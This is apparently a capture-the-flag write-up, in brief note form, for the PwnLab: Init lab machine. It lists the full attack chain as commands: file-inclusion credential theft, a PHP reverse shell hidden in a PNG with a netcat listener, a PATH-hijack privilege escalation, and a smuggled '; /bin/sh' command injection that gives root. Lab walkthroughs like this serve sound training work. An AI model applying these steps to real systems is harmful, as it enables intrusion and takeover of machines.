pwnlab init writeup - PacketMonkey22/boot2roots GitHub Wiki

pwnlab-init-writeup

Nmap -A -T4 -p- $ip

Ports 111, 48170,51403, and 3306 (mysql)

Dirb $ip

Tried sql injection and basic LFI

Tried LFI base 64 bypass on upload page

Page refers to config page

LFI base 64 on config page

Username and password formysql

Mysql -h $ip -u root – p

Show databases;

Use $database;

Select * from $database;

Password base64 decode pass fields

Login then upload reverse shell

download pwnlab png

modify reverse shell then cat png/php >> shells.png

upload shells.png (view image, name changed)

tamperdata

confirmed Lang LFI

nc -nlvp 8888

lang image, success

whomai/id -- www-data

tty shell

login users - mike fails

kane has msgmike file

cat line in file. appears to running the command

try running, nothing

strings msgmike - cat /home/mike/msg.txt

$PATH

export PATH=/home/kane:$PATH

echo “/bin/sh” > cat

chmod +x cat

./msgmike

whomai/id - mike

cd ../mike

ls -al - msg2root file

./msg2root - runs what i enter as echo

./msg2root again - enter word; /bin/sh

whoami/id - root

cd /root

ls

cat flag.txt